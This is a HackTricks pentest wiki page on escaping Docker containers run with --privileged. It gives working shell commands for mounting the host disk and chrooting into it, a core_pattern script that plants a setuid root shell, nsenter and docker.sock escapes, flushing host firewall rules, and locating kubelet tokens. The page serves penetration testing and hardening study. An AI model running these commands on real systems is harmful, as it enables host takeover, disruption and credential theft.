privileged-containers.md (11851B)
1 --- 2 title: "Escaping From --privileged Containers" 3 section: "Linux" 4 sectionSlug: "linux-hardening" 5 sourcePath: "src/linux-hardening/containers-namespaces/container-security/privileged-containers.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/containers-namespaces/container-security/privileged-containers.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Escaping From `--privileged` Containers 14 15 ## Overview 16 17 A container started with `--privileged` is not the same thing as a normal container with one or two extra permissions. In practice, `--privileged` removes or weakens several of the default runtime protections that normally keep the workload away from dangerous host resources. The exact effect still depends on the runtime and host, but for Docker the usual result is: 18 19 - all capabilities are granted 20 - the device cgroup restrictions are lifted 21 - many kernel filesystems stop being mounted read-only 22 - default masked procfs paths disappear 23 - seccomp filtering is disabled 24 - AppArmor confinement is disabled 25 - SELinux isolation is disabled or replaced with a much broader label 26 27 The important consequence is that a privileged container usually does **not** need a subtle kernel exploit. In many cases it can simply interact with host devices, host-facing kernel filesystems, or runtime interfaces directly and then pivot into a host shell. 28 29 ## What `--privileged` Does Not Automatically Change 30 31 `--privileged` does **not** automatically join the host PID, network, IPC, or UTS namespaces. A privileged container can still have private namespaces. That means some escape chains require an extra condition such as: 32 33 - a host bind mount 34 - host PID sharing 35 - host networking 36 - visible host devices 37 - writable proc/sys interfaces 38 39 Those conditions are often easy to satisfy in real misconfigurations, but they are conceptually separate from `--privileged` itself. 40 41 ## Escape Paths 42 43 ### 1. Mount The Host Disk Through Exposed Devices 44 45 A privileged container usually sees far more device nodes under `/dev`. If the host block device is visible, the simplest escape is to mount it and `chroot` into the host filesystem: 46 47 ```bash 48 ls -l /dev/sd* /dev/vd* /dev/nvme* 2>/dev/null 49 mkdir -p /mnt/hostdisk 50 mount /dev/sda1 /mnt/hostdisk 2>/dev/null || mount /dev/vda1 /mnt/hostdisk 2>/dev/null 51 ls -la /mnt/hostdisk 52 chroot /mnt/hostdisk /bin/bash 2>/dev/null 53 ``` 54 55 If the root partition is not obvious, enumerate the block layout first: 56 57 ```bash 58 fdisk -l 2>/dev/null 59 blkid 2>/dev/null 60 debugfs /dev/sda1 2>/dev/null 61 ``` 62 63 If the practical path is to plant a setuid helper in a writable host mount rather than to `chroot`, remember that not every filesystem honors the setuid bit. A quick host-side capability check is: 64 65 ```bash 66 mount | grep -v "nosuid" 67 ``` 68 69 This is useful because writable paths under `nosuid` filesystems are much less interesting for classic "drop a setuid shell and execute it later" workflows. 70 71 The weakened protections being abused here are: 72 73 - full device exposure 74 - broad capabilities, especially `CAP_SYS_ADMIN` 75 76 Related pages: 77 78 [Capabilities](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/capabilities) 79 80 [Mount Namespace](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/namespaces/mount-namespace) 81 82 ### 2. Mount Or Reuse A Host Bind Mount And `chroot` 83 84 If the host root filesystem is already mounted inside the container, or if the container can create the necessary mounts because it is privileged, a host shell is often only one `chroot` away: 85 86 ```bash 87 mount | grep -E ' /host| /mnt| /rootfs' 88 ls -la /host 2>/dev/null 89 chroot /host /bin/bash 2>/dev/null || /host/bin/bash -p 90 ``` 91 92 If no host root bind mount exists but host storage is reachable, create one: 93 94 ```bash 95 mkdir -p /tmp/host 96 mount --bind / /tmp/host 97 chroot /tmp/host /bin/bash 2>/dev/null 98 ``` 99 100 This path abuses: 101 102 - weakened mount restrictions 103 - full capabilities 104 - lack of MAC confinement 105 106 Related pages: 107 108 [Mount Namespace](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/namespaces/mount-namespace) 109 110 [Capabilities](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/capabilities) 111 112 [Apparmor](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/apparmor) 113 114 [Selinux](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/selinux) 115 116 ### 3. Abuse Writable `/proc/sys` Or `/sys` 117 118 One of the big consequences of `--privileged` is that procfs and sysfs protections become much weaker. That can expose host-facing kernel interfaces that are normally masked or mounted read-only. 119 120 A classic example is `core_pattern`:<sup>[[1]](#references)</sup> 121 122 ```bash 123 [ -w /proc/sys/kernel/core_pattern ] || exit 1 124 overlay=$(mount | sed -n 's/.*upperdir=\([^,]*\).*/\1/p' | head -n1) 125 cat <<'EOF' > /shell.sh 126 #!/bin/sh 127 cp /bin/sh /tmp/rootsh 128 chmod u+s /tmp/rootsh 129 EOF 130 chmod +x /shell.sh 131 echo "|$overlay/shell.sh" > /proc/sys/kernel/core_pattern 132 cat <<'EOF' > /tmp/crash.c 133 int main(void) { 134 char buf[1]; 135 for (int i = 0; i < 100; i++) buf[i] = 1; 136 return 0; 137 } 138 EOF 139 gcc /tmp/crash.c -o /tmp/crash 140 /tmp/crash 141 ls -l /tmp/rootsh 142 ``` 143 144 Other high-value paths include: 145 146 ```bash 147 cat /proc/sys/kernel/modprobe 2>/dev/null 148 cat /proc/sys/fs/binfmt_misc/status 2>/dev/null 149 find /proc/sys -maxdepth 3 -writable 2>/dev/null | head -n 50 150 find /sys -maxdepth 4 -writable 2>/dev/null | head -n 50 151 ``` 152 153 This path abuses: 154 155 - missing masked paths 156 - missing read-only system paths 157 158 Related pages: 159 160 [Masked Paths](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/masked-paths) 161 162 [Read Only Paths](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/read-only-paths) 163 164 ### 4. Use Full Capabilities For Mount- Or Namespace-Based Escape 165 166 A privileged container gets the capabilities that are normally removed from standard containers, including `CAP_SYS_ADMIN`, `CAP_SYS_PTRACE`, `CAP_SYS_MODULE`, `CAP_NET_ADMIN`, and many others. That is often enough to turn a local foothold into a host escape as soon as another exposed surface exists. 167 168 A simple example is mounting additional filesystems and using namespace entry: 169 170 ```bash 171 capsh --print | grep cap_sys_admin 172 which nsenter 173 nsenter -t 1 -m -u -n -i -p sh 2>/dev/null || echo "host namespace entry blocked" 174 ``` 175 176 If host PID is also shared, the step becomes even shorter: 177 178 ```bash 179 ps -ef | head -n 50 180 nsenter -t 1 -m -u -n -i -p /bin/bash 181 ``` 182 183 This path abuses: 184 185 - the default privileged capability set 186 - optional host PID sharing 187 188 Related pages: 189 190 [Capabilities](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/capabilities) 191 192 [Pid Namespace](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/namespaces/pid-namespace) 193 194 ### 5. Escape Through Runtime Sockets 195 196 A privileged container frequently ends up with host runtime state or sockets visible. If a Docker, containerd, or CRI-O socket is reachable, the simplest approach is often to use the runtime API to launch a second container with host access: 197 198 ```bash 199 find / -maxdepth 3 \( -name docker.sock -o -name containerd.sock -o -name crio.sock \) 2>/dev/null 200 docker -H unix:///var/run/docker.sock run --rm -it -v /:/mnt ubuntu chroot /mnt bash 2>/dev/null 201 ``` 202 203 For containerd: 204 205 ```bash 206 ctr --address /run/containerd/containerd.sock images ls 2>/dev/null 207 ``` 208 209 This path abuses: 210 211 - privileged runtime exposure 212 - host bind mounts created through the runtime itself 213 214 Related pages: 215 216 [Mount Namespace](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/namespaces/mount-namespace) 217 218 [Runtime Api And Daemon Exposure](/hacktricks/linux-hardening/containers-namespaces/container-security/runtime-api-and-daemon-exposure) 219 220 ### 6. Remove Network Isolation Side Effects 221 222 `--privileged` does not by itself join the host network namespace, but if the container also has `--network=host` or other host-network access, the complete network stack becomes mutable: 223 224 ```bash 225 capsh --print | grep cap_net_admin 226 ip addr 227 ip route 228 iptables -S 2>/dev/null || nft list ruleset 2>/dev/null 229 ip link set lo down 2>/dev/null 230 iptables -F 2>/dev/null 231 ``` 232 233 This is not always a direct host shell, but it can yield denial of service, traffic interception, or access to loopback-only management services. 234 235 Related pages: 236 237 [Capabilities](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/capabilities) 238 239 [Network Namespace](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/namespaces/network-namespace) 240 241 ### 7. Read Host Secrets And Runtime State 242 243 Even when a clean shell escape is not immediate, privileged containers often have enough access to read host secrets, kubelet state, runtime metadata, and neighboring container filesystems: 244 245 ```bash 246 find /var/lib /run /var/run -maxdepth 3 -type f 2>/dev/null | head -n 100 247 find /var/lib/kubelet -type f -name token 2>/dev/null | head -n 20 248 find /var/lib/containerd -type f 2>/dev/null | head -n 50 249 ``` 250 251 If `/var` is host-mounted or the runtime directories are visible, this can be enough for lateral movement or cloud/Kubernetes credential theft even before a host shell is obtained. 252 253 Related pages: 254 255 [Mount Namespace](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/namespaces/mount-namespace) 256 257 [Sensitive Host Mounts](/hacktricks/linux-hardening/containers-namespaces/container-security/sensitive-host-mounts) 258 259 ## Checks 260 261 The purpose of the following commands is to confirm which privileged-container escape families are immediately viable. 262 263 ```bash 264 capsh --print # Confirm the expanded capability set 265 mount | grep -E '/proc|/sys| /host| /mnt' # Check for dangerous kernel filesystems and host binds 266 ls -l /dev/sd* /dev/vd* /dev/nvme* 2>/dev/null # Check for host block devices 267 grep Seccomp /proc/self/status # Confirm seccomp is disabled 268 cat /proc/self/attr/current 2>/dev/null # Check whether AppArmor/SELinux confinement is gone 269 find / -maxdepth 3 -name '*.sock' 2>/dev/null # Look for runtime sockets 270 ``` 271 272 What is interesting here: 273 274 - a full capability set, especially `CAP_SYS_ADMIN` 275 - writable proc/sys exposure 276 - visible host devices 277 - missing seccomp and MAC confinement 278 - runtime sockets or host root bind mounts 279 280 Any one of those may be enough for post-exploitation. Several together usually mean the container is functionally one or two commands away from host compromise. 281 282 ## Related Pages 283 284 [Capabilities](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/capabilities) 285 286 [Seccomp](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/seccomp) 287 288 [Apparmor](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/apparmor) 289 290 [Selinux](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/selinux) 291 292 [Masked Paths](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/masked-paths) 293 294 [Read Only Paths](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/read-only-paths) 295 296 [Mount Namespace](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/namespaces/mount-namespace) 297 298 [Pid Namespace](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/namespaces/pid-namespace) 299 300 [Network Namespace](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/namespaces/network-namespace) 301 302 ## References 303 304 - [1] [Escaping privileged containers for fun](https://pwning.systems/posts/escaping-containers-for-fun/)